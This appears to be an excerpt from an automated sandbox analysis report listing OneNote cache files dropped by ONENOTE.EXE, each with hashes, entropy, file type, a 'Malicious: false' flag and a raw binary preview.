Preview:	2...>.......*...v.......................................................................................................................................2...>...........v...R............................I.......I.qk..B.....LZ.N.......N..<.q..[..2._.N..<.q..[..2._.N...I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'..............iU.'.k..A.3.S......N...^...............z...x.GJ.a.fA...........f........................................I.qk..B.....LZ.............iU.'.k..A.3.S...........iU.'.k..A.3.S............N.......N.......N...........................................N.j.....N.T.]...N.......N...B...N.H.....N...B...N...>.).N...J...................;........4...4...4.."...............N...N...N...z...y.. x.. ...........$........4......7...7........................;........4...4...4..........N.......N.....#.N.............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000001C.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.103049632537083
Encrypted:	false
SSDEEP:	48:Cesafm5fittCeE7CW3Xs9NdXTogrdSreIpdXfGFxmMZ:Vsdfi5E7tXs9NRThRK5Ct
MD5:	89E781F4E8AC2B1F5B5950AB7669FDDA
SHA1:	08526A3164393503CF38B2421B3E844DAF1A41AF
SHA-256:	940AC3A2B08923C1296E0AFB6723B58EB6C0A44F1B46EE11E0D47E9268B1C32C
SHA-512:	1439A97DE42AE273BC21E84001A7A436AAA4F28CEC56A00522FB009B8A89CA28CBAC7DBD2D8ED5261260171E934BAE849A22AC23E1381F6A9699CD839A44F569
Malicious:	false
Preview:	2...>.......*...v.......................................................................................................................................2...>...........v...R............................I.......I.qk..B.....LZ.o.......o...9....E..Cl..o...9....E..Cl..o...I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'.............1.....-.:...-....N...^................f@..#.K...x..).........f........................................I.qk..B.....LZ............1.....-.:...-........1.....-.:...-..........o.......o.......o...........................................o.j.....o.T.]...o.......o...B...o.H.....o...B...o...>.).o...J...................;........4...4...4.."...............o...o...o...z...y.. x.. ...........$........4......7...7........................;........4...4...4..........o.......o.....#.o.............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000001D.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.120985892418447
Encrypted:	false
SSDEEP:	48:WEtsAo67JXrC/7Zct3w6EEC/lXU9dJxToerdSrLIndXhW4J8g4kebN:VsarE7ZcREEAXU9dT3RKYc
MD5:	069CAB6323328C856A169204F25998F6
SHA1:	B16368E012D622283DB80CE8CD7BF8052F9B5995
SHA-256:	C27CBFFEFFAEA11CCDB095F96A70E6C793BD16DD9D1DC96248DC79E84B71C63A
SHA-512:	E16C338E6F194ABA4744F1A1329169100B1748FE20FAFCB7C8F7836223AFB709DFB927B0DAE1DE41251AF3EC8E807B594635EB72B053F63E88187FA32A7FFD1D
Malicious:	false
Preview:	2...>.......*...v.......................................................................................................................................2...>...........v...R............................I.......I.qk..B.....LZ'.......'..a........p$,8'..a........p$,8'....I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'............. .J..H..HgB.D......N...^.................$..6F.^@.............f........................................I.qk..B.....LZ............ .J..H..HgB.D.......... .J..H..HgB.D...........'.......'.......'...........................................'..j....'..T.]..'.......'...B..'..H....'....B..'....>.)'....J...................;........4...4...4.."..............'...'...'....z...y.. x.. ...........$........4......7...7........................;........4...4...4.........'.......'......#'..............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000001E.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.144221523787201
Encrypted:	false
SSDEEP:	48:jyysnKgYjStQtAOE2CHQBXrEPB9rO0To6rdSr6IBRdX5ALX86p:VsTtQtE2PBXgB9q0TPRKLA
MD5:	5EE9A6895214E85A137F3A784F60CFD7
SHA1:	CED03E6333780485DA2DAB834B5E2242F3DA3CC3
SHA-256:	9762093E9A300FCEA514C47866B31E4A28BE13040F6308A877372D5EF8A4DB77
SHA-512:	966239B7530B49A6F79E501118B1742B4747748B1CCFA4485CD911863A1ADCA59B2A13F218E756098B611841DC4943873457B05382711824AB3007175010F8B6
Malicious:	false
Preview:	2...>.......*...v.......................................................................................................................................2...>...........v...R............................I.......I.qk..B.....LZ.].......]...e\.3.,......]...e\.3.,......]...I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'.............`....Z..#$./.O......N...^................YcO.D...R!...........f........................................I.qk..B.....LZ............`....Z..#$./.O..........`....Z..#$./.O............].......].......]...........................................].j.....].T.]...].......]...B...].H.....]...B...]...>.).]...J...................;........4...4...4.."...............]...]...]...z...y.. x.. ...........$........4......7...7........................;........4...4...4..........].......].....#.].............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000001F.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.110381618440931
Encrypted:	false
SSDEEP:	96:FsWhtJnSzT2kEieIX7I9IpgTtRK8xt0+wQ6D:FsWhtJSzyxTIX7I9IpgpRK8xt0+wQ6
MD5:	068C3F89C557C328E19E701C92C719AC
SHA1:	6C526A92CEB2EFC58F8240C3F64D1BB047C4A949
SHA-256:	FBA5E8AC586C0DBCBE0F9FFDD7EE283B6C2DF08B8653E454C8CF08FCEA58C7E2
SHA-512:	059414F6FCC47A41A592AA380F8ECEA061A6F8A730EBCE13C6D1CCB05E7E08B1BE82EA0A8EE91893454ED591F26D8FC401A2B57EE59EB8D0ED2322C147446172
Malicious:	false
Preview:	2...>..........v.......................................................................................................................................2...>...........v...R............................I.......I.qk..B.....LZ.............F.:....I......F.:....I......I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'.............b+.'.d../...s.b....N...^................y...@O...Uy...........f........................................I.qk..B.....LZ............b+.'.d../...s.b........b+.'.d../...s.b........................................................................j.......T.]...............B.....H.........B.......>.).....J...................;........4...4...4.."...........................z...y.. x.. ...........$........4......7...7........................;........4...4...4........................#...............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000001G.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.111042861738723
Encrypted:	false
SSDEEP:	48:hs5wPSI0gC5t6DpOEnpDCZPOXY92IxKEjcTo2CrdSrVIeDdXmuaH+1:hsfgC5kDEE1FXY92IxwTkRKjDl
MD5:	6619756788674191DD66105FDEBFCD69
SHA1:	5BFE57A2914A730DEE82D3801D14EE5A79589102
SHA-256:	8B81A058C4D5D3E7E67D5ACE2040107836F7A7ABAB74D23BC294D049C5EBB125
SHA-512:	CF77BD00F5652A45DB13CC68951B2AFFE98CE6022D87152012BC27D6A6AE53C09516A6069E23D14BDEBBFB62A786E4D5496EB7091C8783115DC3AA7D5C171FA7
Malicious:	false
Preview:	2...>.......*...v.......................................................................................................................................2...>...........v...R............................I.......I.qk..B.....LZ3.......3...p...!L.(..U.3...p...!L.(..U.3....I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'............._N."..5.6.0.([......N...^..................;vknF..?..n.........f........................................I.qk..B.....LZ............_N."..5.6.0.([.........._N."..5.6.0.([...........3.......3.......3...........................................3..j....3..T.]..3.......3....B..3..H....3....B..3....>.)3....J...................;........4...4...4.."..............3...3...3....z...y.. x.. ...........$........4......7...7........................;........4...4...4.........3.......3......#3..............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000001H.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.094079303613883
Encrypted:	false
SSDEEP:	48:CnxusYBZiJ07NtdGeEmCKJX89sP9beITotrdSr4IOdXC1xsxnknGxrU01:NsX0pBEm/X89YfTsRKgR
MD5:	533C2B06D627884237D58C90C86DD66C
SHA1:	534A777BA522A59196FC11B5510230F29462D41E
SHA-256:	B886C8088125E0EE3F59967DE0DF91CE30E38935BB3BA0691BA72DF9F5287AD5
SHA-512:	DC8E8EBF2D26595D0A9FD26D7E81BEF2AC78944EDA9C98F42B30CE6F5EDC32F8B1843D074D5366FB20EFC9A7C97DD0C289B9654BB8246AA60D79EAC0BE14996F
Malicious:	false
Preview:	2...>.......*...v.......................................................................................................................................2...>...........v...R............................<.......<.{+.!.2W......I.......I.qk..B.....LZ.<.{+.!.2W......<...I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'.............~xjd..h......y.{....N...^................x....A.,;.h.PV........f........................................I.qk..B.....LZ............~xjd..h......y.{........~xjd..h......y.{..........<.......<.......<...........................................<.j.....<.T.]...<.......<...B...<.H.....<...B...<...>.).<...J...................;........4...4...4.."...............<...<...<...z...y.. x.. ...........$........4......7...7........................;........4...4...4..........<.......<.....#.<.............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000001I.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.122261301713409
Encrypted:	false
SSDEEP:	48:KSrJsOY5ajZbstqoElCC5WlXSl9WmmTourdSr9FmIkKdXp50QIHSeJ:KSrJs0jZbs1ElCZlXSl9fmTLRK/MKW
MD5:	8530FF1F44ABA8BC9471C97D90DD7468
SHA1:	A794560E52CF2FF7D600F2E385645EF52F7CE857
SHA-256:	20A7646AB95C045FE70A89551F307AE9E4AE504F96E4C843AE1967ABAFFAF4C3
SHA-512:	38486DCAF83DC832BBDE01A23CDC12822E425AEB2F987F8B84A12F736182304C69A848620361677A5E6AF9C9471527FA05DD00B524F2F865FFF81D7DCD4D65DE
Malicious:	false
Preview:	2...>.......,...v... ...................................................................................................................................2...>...........v...T............................I.......I.qk..B.....LZ.........=t...1?.......=t...1?.........I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'.............n.V.E...?$\...c.....N...^...............!.....J.NQF..........f........................................I.qk..B.....LZ............n.V.E...?$\...c.........n.V.E...?$\...c.....................................................................j......T.].............B....H........B......>.)....J...................;........4...4...4.."........................z...y.. x.. ...........$........4......7...7........................;........4...4...4......................#..............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000001J.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.0975833820262935
Encrypted:	false
SSDEEP:	96:K7csQrTpwtcn7RE6c7LIXPI9SGbTARKy2azy6TWe+Co3XyYeJ:Xso4c6DsXQ9bbkRKy2
MD5:	40B82CF733AC938800579742777EE4E4
SHA1:	667AD437906C34ACEF5BABD7F552438EE6F45E35
SHA-256:	7B54B940721F8EFD3EA9E0165A8F053174EB176ECC6055110287BA24563C7103
SHA-512:	9445D70CC637ED1820FDB2E037D2380B09A72ACE69FE5A9F2C2070FFBF8C1E5B188A3D419C8F9E8D7C3E5EE15DD7951F685BEE22BDEA5AC387737357988F1B6F
Malicious:	false
Preview:	2...>.......,...v... ...................................................................................................................................2...>...........v...T............................I.......I.qk..B.....LZ.ku......ku.Z....=....u.ku.Z....=....u.ku..I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'..............H........O..pb....N...^................-lj..i@....M..........f........................................I.qk..B.....LZ.............H........O..pb.........H........O..pb..........ku......ku......ku..........................................kuj.....kuT.]...ku......ku..B...kuH.....ku..B...ku..>.).ku..J...................;........4...4...4.."...............ku..ku..ku..z...y.. x.. ...........$........4......7...7........................;........4...4...4..........ku......ku....#.ku............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000001K.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.094287737141189
Encrypted:	false
SSDEEP:	48:QHsvU8FDYU8NU87mbq2EtbKEIWCCYKXSd39rFK7To8rdSrKIJdXXiMrjU8NU8D8W:QHsnbq2E4EPBXSd39GTFRKtErE
MD5:	08A91E9B79A34682588AA257168C91F8
SHA1:	EB3524292936377C911B7ACF558DC3286F5E903C
SHA-256:	1748F28A2CF0C068DC83F615D3A766133C28B48F2CDF322D979738F54F2BD4BE
SHA-512:	BADA6FA928C76C210B125122B35AA3341341370D6DF665FF2BCFABD0212358EEDADD41D3790FC196225D53724F002CF1F04FFDB786C90EDDE2D718DF3D2C1885
Malicious:	false
Preview:	2...>...........v..."...................................................................................................................................2...>...........v...V............................I.......I.qk..B.....LZ...........9..../.>.q......9..../.>.q........I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'...................B.9}4...7{....N...^.................b..fdB..G..&.........f........................................I.qk..B.....LZ..................B.9}4...7{..............B.9}4...7{........................................................................j.......T.]...............B.....H.........B.......>.).....J...................;........4...4...4.."...........................z...y.. x.. ...........$........4......7...7........................;........4...4...4........................#...............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000001L.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.120009214495203
Encrypted:	false
SSDEEP:	48:tsTBg49DqP1toSEVC/BXw9h55dGTofrdSreIUdXR4xemZel:tsHuP15EVsXw9ZMTKRKEjL
MD5:	FC097CC43306C5181664221BB247EFDF
SHA1:	413A5B3EAC130AC092F8B5A3422FA5DC729E98EF
SHA-256:	2F21CC3A98ACC9915A11949C2E2BB8E32063D1A30C34AE9371BC901C7A370D9B
SHA-512:	E1758FAB7618718564DEE223517E16DB9B44EA36AE3FADA1CCB97DCDD89C2127849AA5487253E24A6D657817CAA7D190449029B69B4EDFBB3B95AF800193BBFA
Malicious:	false
Preview:	2...>..........v.......................................................................................................................................2...>...........v...R............................I.......I.qk..B.....LZ.i]......i]......)d0.....i]......)d0.....i]..I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'...............:...4.........N...^................".j...H....v.c?........f........................................I.qk..B.....LZ..............:...4...............:...4...............i]......i]......i]..........................................i]j.....i]T.]...i]......i]..B...i]H.....i]..B...i]..>.).i]..J...................;........4...4...4.."...............i]..i]..i]..z...y.. x.. ...........$........4......7...7........................;........4...4...4..........i]......i]....#.i]............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000001M.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.126073068673499
Encrypted:	false
SSDEEP:	96:Fs7zoNZEsWM+XA9ET8RKr7wQIRstQC63:Fs7zow8+XA9EARKr7wQIStQn3
MD5:	5C89F6865F39D0DDA9FCAE63A76AF01F
SHA1:	3A3669A361D29D411F85E4ABD380E2EB7D120D03
SHA-256:	5FCB5E48E40129303045A67F67271AC9A850F01061F9D7FDE3A0301A51150FF3
SHA-512:	1184132A1DE01F9DE0B8C442799F356736EAAE43F20159ECB5DC31294FC7F14CB5225A0556802DD5CEC90D14064CCC9B416A7562D9AC22175BC2475C4CABDEFB
Malicious:	false
Preview:	2...>.......*...v.......................................................................................................................................2...>...........v...R............................I.......I.qk..B.....LZ...........;ww..8b.........;ww..8b...........I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'................EPLU.+4%.........N...^..................c...F.....(.:........f........................................I.qk..B.....LZ...............EPLU.+4%................EPLU.+4%.............................................................................j.......T.]..............B.....H.........B.......>.).....J...................;........4...4...4.."...........................z...y.. x.. ...........$........4......7...7........................;........4...4...4........................#...............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000001N.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.13112589679243
Encrypted:	false
SSDEEP:	48:+Tusv5pKp4eP/4tcWER35uCAZ5WXtW9R1TTokrdSrSIAedXPl5ybCUWW5b8sF:+TusuieP/4xER3cKXA9RxT9RKkeGv
MD5:	89F8680CB9E0D6922A2902597EB5EA19
SHA1:	82BEDDE5B4C7F1DD558C1830448330DBC29F455C
SHA-256:	E4DEC192BEBA39F3C0FE506874E0F7897FEA7CFC40F79629AE08CB648AED8A51
SHA-512:	1D9636F9B93B6E534ECDF9E303A384562A2B74715E935CCC06648A05491F8C8B80906BBF61EB1EC7187894C017D07355667377AD080F8C8C4375CB1677FD75E9
Malicious:	false
Preview:	2...>.......*...v.......................................................................................................................................2...>...........v...R............................I.......I.qk..B.....LZ..<.......<..!..<..!9....<..!..<..!9....<..I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'...............O{l.........r....N...^................o..f?.O...^.,.........f........................................I.qk..B.....LZ..............O{l.........r..........O{l.........r...........<.......<.......<...........................................<j......<T.]....<.......<..B....<H......<..B....<..>.)..<..J...................;........4...4...4.."................<...<...<..z...y.. x.. ...........$........4......7...7........................;........4...4...4...........<.......<....#..<............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000001O.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.126879614443054
Encrypted:	false
SSDEEP:	48:j1s7iDABg0t1ieENAIWCp2hlXk9LX9TomrdSrsUIh1dXtwGkRvqhTnG9Hdz:j1sfBhXtENA1s2LXk9LtT7RKshOF
MD5:	5F46C4470612E5F8CCB0995263BF0783
SHA1:	B12A7A0B6B9CAC6891CCF52A03DF30759CB842C5
SHA-256:	4A5C90038FB0750D2FE4AF65B7D8AEDAEA4651241CD144A20D97359A0FF306F7
SHA-512:	0B9B5AA9D9CFF6FD8199C4C42061E646901BDA59F0AC45392C117236F95BDDC989F9E9285D8F4CDA7D5AF4C66048FA69A4115602EBCD0C8DD490A3476325B3A2
Malicious:	false
Preview:	2...>.......*...v.......................................................................................................................................2...>...........v...R............................I.......I.qk..B.....LZ............O....bD........O....bD.........I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'...............(..<q.'P5.Z.G.....N...^..................m...I...M.\|.........f........................................I.qk..B.....LZ..............(..<q.'P5.Z.G...........(..<q.'P5.Z.G.........................................................................j.......T.]...............B.....H.........B.......>.).....J...................;........4...4...4.."...........................z...y.. x.. ...........$........4......7...7........................;........4...4...4........................#...............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000001P.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.121715061830216
Encrypted:	false
SSDEEP:	96:KwsHa6TxVXEyruX49TwTNRKADahVcT08:3sH7Tn0ySX49TwRRKADaHc
MD5:	73F7C039F98A5507E8C4ECBAA6B98FB6
SHA1:	B06452AC4F83F2B691085C60535192977CBAF07C
SHA-256:	5C98ABC3039990F7B35579D94EAE6492B67C333D6C93B4974A9D1DD73035676F
SHA-512:	3D1DA74A8EC0730FEDAF483B5C0E5591A956C75BAE46FE364A6C91C19ADE0B5BC26C562916B7CD50100AF2A4C2B5F6B74536E2D6FD2EBA5D9840DA5303587B9D
Malicious:	false
Preview:	2...>.......,...v... ...................................................................................................................................2...>...........v...T............................I.......I.qk..B.....LZ.v.......v.]....0.o..S9S.v.]....0.o..S9S.v...I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'..............}.......6..o.....N...^...............dk".pD...O.H'.........f........................................I.qk..B.....LZ.............}.......6..o..........}.......6*..o...........v.......v.......v...........................................v.j.....v.T.]...v.......v...B...v.H.....v...B...v...>.).v...J...................;........4...4...4.."...............v...v...v...z...y.. x.. ...........$........4......7...7........................;........4...4...4..........v.......v.....#.v.............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000001Q.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.152736379100425
Encrypted:	false
SSDEEP:	48:js1cCTbstKjJmIEJlCDwXHO9HI4W5ZTokrdSrvhIRdXPAmMv0xf:jsdTbs8dEXBXu9wZTZRKvQ+x0x
MD5:	07D2829EDAA46CC37DD945F945FD395D
SHA1:	2A5DE75F194342C66E7A96A5278C39D5CB1E026F
SHA-256:	629FAF9A5F7E672EF91A020B2653494D3BEE9654A511A05C6C36267365E59D5C
SHA-512:	0DB4BB474BAFB60198945E5DCC7572B5B428E803BA471F2F15E9221F56D1C6002C4A48C92A134758FAFC7047CD0D31A3FCE3BCDF7D324C5C8BF8030600FC541C
Malicious:	false
Preview:	2...>.......(...v.......................................................................................................................................2...>...........v...P............................I.......I.qk..B.....LZ=u......=u.....!....U..=u.....!....U..=u...I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'................#..T....nzJ......N...^.................{..oeC.....D........f........................................I.qk..B.....LZ...............#..T....nzJ.............#..T....nzJ...........=u......=u......=u..........................................=u.j....=u.T.]..=u......=u...B..=u.H....=u...B..=u...>.)=u...J...................;........4...4...4.."..............=u..=u..=u...z...y.. x.. ...........$........4......7...7........................;........4...4...4.........=u......=u.....#=u.............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000001R.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	8192
Entropy (8bit):	3.61874393275688
Encrypted:	false
SSDEEP:	96:2OC399QkFfLCIRqsxej0EG4ILEZc4IrH4Iglb17I:2Oi9HFfnqLlOIZUrXgx
MD5:	3B63AC1993BA220796791FDF2CEE81BD
SHA1:	3F0917BFBE17CB9770DF86B23C188AE4CB888776
SHA-256:	938798214AD0FAD1C73C8620405EAF8F8EBE73827A9A03AECB76158CE29D219D
SHA-512:	2BB7992AB90F654D99C45570EDB585777A79B6703EA3BBC1E92CE958DA1D0B5BCEC606459E36DCC0C555EEE8BFE0A80D01829D740D9DA4AC3B6CB60D2B7E5A43
Malicious:	false
Preview:	....X....................................................................................................?..................................................X...............8........................................a.I..._..m"......m".&..H...A.....E...q.+....A3~.E.....%k@.....^........7...(...WD....7...........,.......,....................................................3.......3...v......gp.\......\..B....e..2.......^...........<.......,........m"...3...6..Z..7..,...........T.v...m"T......6T)....\T.2...Z.T)R..,....J..,...."..,....q.......m"..........c..,0...e...B4.$...........GP..A..}.....J................................&4..3.>.....,.......,..aR.-....t...\..B....e...\....kv.F..........m".&..H...A...6.m".....>...............7...(...WD.......&4..3.>.....m".&..H...A..............0...........e....4.............."...P.r.o.j.e.c.t. .O.v.e.r.v.i.e.w.......B.^....F...r.QH.....(...........(..."...P.r.o.j.e.c.t. .O.v.e.r.v.i.e.w...j...P.a.g.e.L.o.c.I.D...L.o.c.V.e.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000001S.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	4.62831608522093
Encrypted:	false
SSDEEP:	384:KP89/i9czKMYREYaRtX7vfx8QhdEAFWCjm7bO9S3KZoVvcnatpuKhN8CuI3BWjzJ:KP89/DzK9WYaR9vfx8QhdNFWCjmvO9SC
MD5:	3E3FB8E2D929549F1E05A235765CCD98
SHA1:	1A70AEF9AE017EE4EB06D1AC95F67147E1BCEF00
SHA-256:	05968358ACFD3CA902335DD4C1DEF380BB24CD1A3814FC1C96FEE5AF495BE79C
SHA-512:	82BB0DD148C39A5405BE658EDE0C40EF76EFC18E27B001409C2E3E3345DEF57B8F5646C60A05085C4FF1C404E224F29D73F2322DF870B2EFCC833CFA1A4E88E1
Malicious:	false
Preview:	....>...........v........@..X ...I..........>...T.......v.......PH..X ...H..................................................................................>...`.......v........H..X ...I...............I.......I.qk..B.....LZ.Z.......Z..s.`.......c..Z..s.`.......c..Z....x.....7.../..x..I.qk..B.....LZ.I............I.......I...................................................I.t.....I................................................................4..'...'....................5..'a.7....N...^................Hp..p.A...`o...................................................I.qk..B.....LZ...................5..'a.7..................................Z.......Z.......Z............................................x(.W....x(._....x ......x$......x ......x$......x ..."..x(.~...............;........4...4...4............'.Z.D.Z...z...,4. .......$>........4....7........................Z.3.Z..Z..Z..Z..Z..Z...z...y.. x.. ........ ..$...$........&..$!..7!..7............o.e.L.o.c.I.D...o.e.L.o.c

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000001T.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 7.0, datetime=2004:03:04 13:06:24], progressive, precision 8, 38x792, components 3
Category:	dropped
Size (bytes):	22203
Entropy (8bit):	6.977175130747846
Encrypted:	false
SSDEEP:	192:5q3R1VBvq3R1Flrk6Q0QPJJrR39joOVMJ25d1NkMhIwobbtAAAqYnLJZMJYZ2AC:xw6Q0WJR3FoOVMJIIlAAAqYnMJdD
MD5:	2D3128554F6286809B2C8E99DE5FD3F6
SHA1:	FC42CB04151D36F448093BDEFE33031A9B8D797D
SHA-256:	14FA2D16310485AA1CE41F6D774A3D637E8CF8B03C4F72990155DF274FDB6BD9
SHA-512:	D8531247A6E89ECABEA9C4A78F596CCE3493334EDF71AE4F7998FDDD0F80705948609C89756AB56FDFAB6D04DEC5F699A693801A772CA2EE2465BDD2CE5D2D5A
Malicious:	false
Preview:	......JFIF.....H.H.....XExif..MM..............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop 7.0.2004:03:04 13:06:24............................&.........................................................(.....................&..................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d......................................................................................................................................................"................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?...H.....Go.Kxn.b..g...........%?_....O......q......7G......%%.V..8zm.].v?...jJ~._..>.......O;........o..rI.A.....n.a.........

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000001U.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	8192
Entropy (8bit):	4.023311142402653
Encrypted:	false
SSDEEP:	96:ZasQdWE5Ch9/kn3/kQeuyLgkL+HA6lEXylCTR/yQydyt4:ksQp5Ch9Mn3MQeH3aHA6lEXQCTR/yA
MD5:	E6B1938A1EAC1BA7B71874B1DEEBB8A2
SHA1:	8A40E7066E485A069C9A86E9DDEADC9F796B34C7
SHA-256:	FDA0946F3F99B5CEB1EF0AE47D0A42D55C57A973971A9DEE1BD3F9C2A8F84B74
SHA-512:	E2A59E6C060DD777066B227FD1DA8F9AFA01B94BA68AE862624D3163ED4D8C1D11EEC0498B0C17C48175E4CE7571A32DE49B3411A21EB48A2A3C88B43665E104
Malicious:	false
Preview:	2...>...........v.......................................................................................................................................2...>.......j...v...6............................I.......I.qk..B.....LZ..".)....."'".q.&..1.\|L.."'".q.&..1.\|L.."..I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'.............3/B.......MK_..>....N...^...............4.a...A.`...AK............@&....................................I.qk..B.....LZ............3/B.......MK_..>........3/B.......MK_..>..........."......."......."..........................................."j......"T)Z...."..2...."......."H......"..J.$.."$.z.%.."..0...............;........4...4...4..............z...........................;...!..7......................C.a.l.i.b.r.i.................z.......R...................!..7............S.y.m.b.o.l...................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000001V.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	52945
Entropy (8bit):	7.6490972666456765
Encrypted:	false
SSDEEP:	768:cjvqR0XvFaGCTJffi0tgybmWDoTw71kHUAnjvawrlp2+NUO8dWSNl3PF2PjK/q09:cyRffflgybmWoTw1UUADHUbU21MjpAD
MD5:	AD003F032F32FAC4672D4CE237FA5C5B
SHA1:	AE234931B452F0D649D91291763B919CF350EA49
SHA-256:	ADB1EBBE18D6CD8FF08AA9BF5C83CDB83BF9AA179698E34E93DBCDDE12F04D32
SHA-512:	ECA25FA657ECE3A66D3E650628E0F65D3BADD38864C028AB6553950A1A66D7D55482C85E9E565573E9E5AAFA91C2D53235971C644A266D41EB69F8E72E3A843B
Malicious:	false
